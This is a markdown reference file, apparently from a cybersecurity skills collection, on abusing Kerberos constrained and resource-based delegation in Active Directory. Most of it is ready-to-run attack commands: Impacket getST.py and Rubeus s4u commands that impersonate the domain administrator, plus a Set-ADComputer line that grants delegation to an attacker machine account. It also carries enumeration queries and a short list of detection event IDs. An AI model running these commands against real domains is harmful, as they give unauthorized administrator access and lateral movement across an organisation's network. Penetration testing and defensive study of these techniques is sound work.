Anthropic-Cybersecurity-Skills/skills/exploiting-constrained-delegation-abuse/references/api-reference.md

API Reference: Kerberos Constrained Delegation Abuse

Delegation Types in AD

Type	Attribute	Risk
Unconstrained	TrustedForDelegation	CRITICAL
Constrained	msDS-AllowedToDelegateTo	HIGH
Constrained + Protocol Transition	TrustedToAuthForDelegation	CRITICAL
Resource-Based (RBCD)	msDS-AllowedToActOnBehalfOfOtherIdentity	HIGH

PowerShell Enumeration

Find Constrained Delegation

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} `
    -Properties msDS-AllowedToDelegateTo, TrustedToAuthForDelegation

Find RBCD

Get-ADComputer -Filter * -Properties msDS-AllowedToActOnBehalfOfOtherIdentity `
    | Where-Object {$_.'msDS-AllowedToActOnBehalfOfOtherIdentity' -ne $null}

Impacket — S4U Attack

getST.py — Request Service Ticket

getST.py domain/svc_account:password \
    -spn cifs/target.domain.local \
    -impersonate administrator \
    -dc-ip 10.10.10.1

Use Ticket

export KRB5CCNAME=administrator.ccache
smbclient.py -k -no-pass domain/administrator@target.domain.local

Rubeus — S4U Attack

S4U2Self + S4U2Proxy

Rubeus.exe s4u /user:svc_account /rc4:NTLM_HASH \
    /impersonateuser:administrator \
    /msdsspn:cifs/target.domain.local /ptt

RBCD Abuse

Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_HASH \
    /impersonateuser:administrator \
    /msdsspn:cifs/target.domain.local /ptt

RBCD Setup with PowerShell

Set RBCD

Set-ADComputer target -PrincipalsAllowedToDelegateToAccount attacker$

Verify

Get-ADComputer target -Properties msDS-AllowedToActOnBehalfOfOtherIdentity

BloodHound Cypher Queries

Constrained Delegation Paths

MATCH p=(u)-[:AllowedToDelegate]->(c:Computer)
RETURN u.name, c.name

RBCD Write Access

MATCH p=(u)-[:GenericWrite|WriteDacl|WriteOwner]->(c:Computer)
RETURN u.name, c.name

Detection — Event IDs

Event	Description
4769	Kerberos Service Ticket (check for S4U)
4770	Service Ticket Renewed
4768	TGT Request (monitor for delegation)